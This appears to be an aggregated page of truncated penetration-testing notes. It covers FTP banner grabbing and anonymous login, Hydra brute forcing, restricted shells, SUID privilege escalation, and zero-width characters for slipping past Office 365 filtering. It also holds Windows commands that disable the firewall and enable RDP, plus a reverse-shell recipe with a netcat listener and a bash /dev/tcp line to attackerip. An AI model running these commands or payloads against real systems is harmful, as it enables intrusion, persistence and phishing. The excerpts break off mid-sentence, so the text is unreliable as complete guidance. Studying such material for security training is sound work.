FTP port 21 open
>telnet ip_address 21 (Banner grab)
>> Run command ftp ip_address
>> Check for anonymous access
>>> ftp ip_address
>>> Username: anonymous OR anon
>>> Password: firstname.lastname@example.org
> Hydra brute force
alias Create an alias
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian/Ubuntu)
aptitude Search for and install software packages (Debian/Ubuntu)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index
basename Strip directory and suffix fro...
Unix shell that restricts some of the capabilities available to an interactive user, such as:
– Using cd to change directories
– Setting or unsetting certain environment variables (e.g. SHELL or PATH)
– Specifying command names containing ‘ / ’
– Redirecting output using >, >>, >|, >&, &> operators –...
Zero-Width Spaces to Bypass MS Office 365 Protection
​ - Zero-width space
‌ - zero width non-joiner
‍ - zero width joiner
﻿ - zero width no-break space
０ - full width digit zero
​ (Zero-Width Space)
‌ (Zero-Width Non-Joiner)
‍ (Zero-Width Joiner)
It’s a way in UNIX-like operating systems of running a command as another user without providing credentials. When an executable file is run, the kernel checks its file permissions and, if it sees a bit (known as the SUID bit) on the file, it sets the effective user id of the resultant process to the owner of the file. There is also an equivalent...
We have all heard the cautionary stories about UNIX SUID executables and how we should be careful when coding them because they can provide an easy route to root (pun intended). Unfortunately, not everybody fully understands this, and I have got root a couple of times through ill-thought-out SUID executables.
I had one of these in a recent test an...
What is PowerShell?
PowerShell is an interactive Command-Line Interface (CLI) and automation engine designed by Microsoft to help design system configurations and automate administrative tasks. This tool has its own command-line with a unique programming language similar to Perl. Initially, PowerShell was designed to manage objects on users’ com...
1- /bin : Contains all binary executable programs required for booting and repairing the system. It also contains commands required to run in single-user mode and other basic commands like ps, ls, ping, grep, cp, less.
2- /boot : Boot loader files including Linux Kernel and grub files.
3- /dev : Contains all device files required for the har...
net user user1
# Set path:
netsh firewall show state
netsh firewall show config
# Turn firewall off
netsh firewall set opmode disable
# allow RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Se...
First of all, on your machine, set up a listener, where attackerip is your IP address and 4444 is an arbitrary TCP port unfiltered by the target's firewall:
attacker$ nc -l -v attackerip 4444
Alternatives for Bash shell:
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <...